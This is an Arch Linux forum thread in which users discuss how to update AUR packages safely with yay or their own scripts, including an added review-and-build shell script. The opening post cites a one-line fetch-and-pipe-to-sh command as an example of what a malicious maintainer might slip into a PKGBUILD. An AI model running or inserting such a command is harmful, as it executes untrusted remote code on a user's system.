
#1 2023-06-19 08:30:34

mbw
Member
Registered: 2020-01-04
Posts: 36

Workflow to manage AUR packages safely using yay?

By default, invoking `yay`, I am asked the following things:

  1. Which packages to exclude

  2. Which packages to cleanBuild (as I understand it: git clone again instead of git merge?)

  3. Which packages to show a `git diff` for (shows PKGBUILD and other files, but everything is shown as new/green)

AUR packages are not curated in the same way community packages are. For instance, anyone could adopt an orphaned package and introduce malicious code by e.g. changing the `source` field or `wget malware.ru | sh` in the `prepare()` or whatever.
Like what happened here for example.

So how do you all work with yay/AUR on a day to day basis?
Do you just confirm everything, or do you have your personal workflow of sanity-checking some things (and what?) beforehand?
Do you use additional/different tools that help you in this regard?
Are there any resources, maybe on the arch wiki, I may have missed?

Inb4 "don't use an AUR helper": When I started out with Arch in 2019, I managed all AUR packages by hand.
This however became super tedious when upgrading at some point...


#2 2023-06-19 08:49:42

dogknowsnx
Member
Registered: 2021-04-12
Posts: 648

Re: Workflow to manage AUR packages safely using yay?

So basically what you're saying is, you don't trust the aur but you want to use a don't-worry-I-will-take-care-of-everything aur helper... What's wrong with this picture?


RI - Rest your Eyes and Self

"We are eternal, all this pain is an illusion" - Maynard James Keenan


#3 2023-06-19 09:13:02

mbw
Member
Registered: 2020-01-04
Posts: 36

Re: Workflow to manage AUR packages safely using yay?

I would prefer to use an AUR helper in a way that strikes some middle ground between security and convenience.
While yay may have default actions I can just confirm, it also has lots of options.
Thus, I don't think it's stupid to ask if others use it in a way that addresses the above concerns?


#4 2023-06-19 09:30:43

dogknowsnx
Member
Registered: 2021-04-12
Posts: 648

Re: Workflow to manage AUR packages safely using yay?

Disclaimer: I'm not using any "foreign" aur helpers myself (only my own scripts, that is).

Ok, my 5 cents would be this: Only install packages whose source you do trust (no-brainer). Definitely check whether the source of a pending update changed. If you're using any '-git' packages, you will have to clean build them in order for new commits to be merged (yay will only notify you about an updated PKGBUILD here), all other packages normally don't need a clean build. Don't use yay :P

Last edited by dogknowsnx (2023-06-19 09:39:37)


RI - Rest your Eyes and Self

"We are eternal, all this pain is an illusion" - Maynard James Keenan


#5 2023-06-19 09:49:52

Alad
Wiki Admin/IRC Op
From: Bagelstan
Registered: 2014-05-04
Posts: 2,413

Re: Workflow to manage AUR packages safely using yay?

I would prefer to use an AUR helper in a way that strikes some middle ground between security and convenience.

Pacman wrappers like yay make untrusted packages (AUR) look the same as trusted ones (Arch repositories). They use the same syntax for both, and list both as equivalent source of packages.

A first step is then to not use pacman wrappers. See the table here: https://wiki.archlinux.org/title/AUR_he … _and_build


Mods are just community members who have the occasionally necessary option to move threads around and edit posts. -- Trilby


#6 2023-06-19 12:24:16

Awebb
Member
Registered: 2010-05-06
Posts: 6,298

Re: Workflow to manage AUR packages safely using yay?

Q: So how do you all work with yay/AUR on a day to day basis? Do you just confirm everything, or do you have your personal workflow of sanity-checking some things (and what?) beforehand? Do you use additional/different tools that help you in this regard?
A:
I use auracle to search the aur, see if there is anything to update and for the "buildorder" option.
I have a pacman hook that runs "auracle outdated" on every update and one from rebuild-detector that *drumroll* checks if a package needs to be rebuilt. Hasn't failed so far, although it probably isn't all-knowing.
I have three helper functions with a total of less than 60 lines of code.

aurget:
They only clone on new repos and merge --ff-only on existing repos and only if there is anything new.
I don't build from the git repo folder, but copy the thing to a temp folder ignoring .git. Then it displays the PKGBUILD. Then I type makepkg -si. Has a toggle to not show the PKGBUILD if called from a script.

aurupdate:
If I'm sure I've read all I need about the new version (i.e. have reviewed the PKGBUILD), aurupdate loops through "auracle -q outdated" and calls aurget for each of them. Should probably call aurchain instead, but it has never failed.

aurchain:
Goes over "auracle buildorder" and calls aurget and makepkg -si on the list without displaying the PKGBUILD. I expect myself to have checked that. I just realised I never wrote an "--asdeps" handler.

Done packages go to ~/build/done.

The git diff part is tricky, because nothing tracks the commit that went and became the last installed package. That's why I always read the PKGBUILD or git diff manually. Diffing the last two commits does not produce secure results.



Q: Which packages to exclude:
A: None, unless there is a need.



Q: Which packages to cleanBuild (as I understand it: git clone again instead of git merge?)
A: None, always merge and never build from the git repo directly.



Q: Which packages to show a git diff for?
A: None/Any. If yay shows only green, then yay is using git diff wrong. "git diff commit1 commit2", see git log.



Q: Are there any resources, maybe on the arch wiki, I may have missed?
A: https://wiki.archlinux.org/title/AUR_helpers


Q: Inb4 "don't use an AUR helper": When I started out with Arch in 2019, I managed all AUR packages by hand. This however became super tedious when upgrading at some point...
A: for i in $(pacman -Qqem); do...
1. check for an update
2. merge your local git cache
3. copy files to some temp
4. display PKGBUILD
5. makepkg and install package
done

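The hand-rolled loop at the end of this post, together with dogknowsnx's advice above to check whether a pending update's source changed, as an added POSIX sh example (not Awebb's aurget/aurupdate/aurchain scripts, which are not on this page): it records the commit you last reviewed per package so the diff runs against that commit rather than the last two, and builds from a copy without .git. The AUR_CACHE/AUR_STATE paths and all function names are assumptions; git, makepkg and pacman must be in PATH.

```shell
#!/bin/sh
# Added example, not the poster's own scripts. AUR_CACHE, AUR_STATE and the
# function names are assumptions; git, makepkg and pacman must be in PATH.
set -eu
AUR_CACHE="${AUR_CACHE:-$HOME/build/aur}"          # one git clone per package
AUR_STATE="${AUR_STATE:-$HOME/build/reviewed.txt}" # lines of "pkgname commit"

# Commit recorded as reviewed for package $1 (empty if never reviewed).
last_reviewed() {
    [ -f "$AUR_STATE" ] || return 0
    awk -v p="$1" '$1 == p { c = $2 } END { print c }' "$AUR_STATE"
}
# Record commit $2 as reviewed for package $1, replacing any older entry.
mark_reviewed() {
    { [ -f "$AUR_STATE" ] && grep -v "^$1 " "$AUR_STATE" || true
      echo "$1 $2"; } > "$AUR_STATE.tmp"
    mv "$AUR_STATE.tmp" "$AUR_STATE"
}
# Clone on first use, afterwards fast-forward only; the clone is never rebuilt.
aur_fetch() {
    if [ -d "$AUR_CACHE/$1/.git" ]; then git -C "$AUR_CACHE/$1" pull -q --ff-only
    else git clone -q "https://aur.archlinux.org/$1.git" "$AUR_CACHE/$1"; fi
}
# Show what changed since the commit you last reviewed (the whole PKGBUILD the
# first time). Returns 0 only when you accept the new commit; read source=,
# prepare() and build() changes with particular care.
aur_review() {
    dir="$AUR_CACHE/$1"; base=$(last_reviewed "$1"); cur=$(git -C "$dir" rev-parse HEAD)
    if [ -z "$base" ]; then cat "$dir/PKGBUILD"
    elif [ "$base" != "$cur" ]; then git -C "$dir" diff "$base" "$cur"
    else echo "$1: nothing new since last review"; return 1; fi
    printf 'Accept %s at %s? [y/N] ' "$1" "$cur"; read -r ans
    [ "$ans" = y ] || return 1
    mark_reviewed "$1" "$cur"
}
# Build from a copy without .git so a build never touches the clone.
aur_build() {
    tmp=$(mktemp -d); cp -r "$AUR_CACHE/$1/." "$tmp"; rm -rf "$tmp/.git"
    (cd "$tmp" && makepkg -si); rm -rf "$tmp"
}
# The loop from the post: every foreign package, fetched, reviewed, then built.
# (-git packages still need a rebuild even when nothing here changed.)
aur_update_all() {
    for p in $(pacman -Qqem); do
        aur_fetch "$p"
        if aur_review "$p"; then aur_build "$p"; fi
    done
}
```

Source the file and call aur_update_all, or aur_fetch/aur_review/aur_build for a single package.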

#7 2023-06-24 09:00:08

mbw
Member
Registered: 2020-01-04
Posts: 36

Re: Workflow to manage AUR packages safely using yay?

Thanks for the replies!
In particular, the very detailed last one which I somehow missed because I cannot read and did not realize that new email notifications will only arrive when I visit the forum again.

The issue with yay not displaying a sensible diff is indeed an open bug, it seems.

I will try to transition away from yay again and maybe try to get something simpler to work like aurutils or similar, after doing some review.

Maybe even hand-roll the loop at the end of the last post and go from there, haven't decided yet.
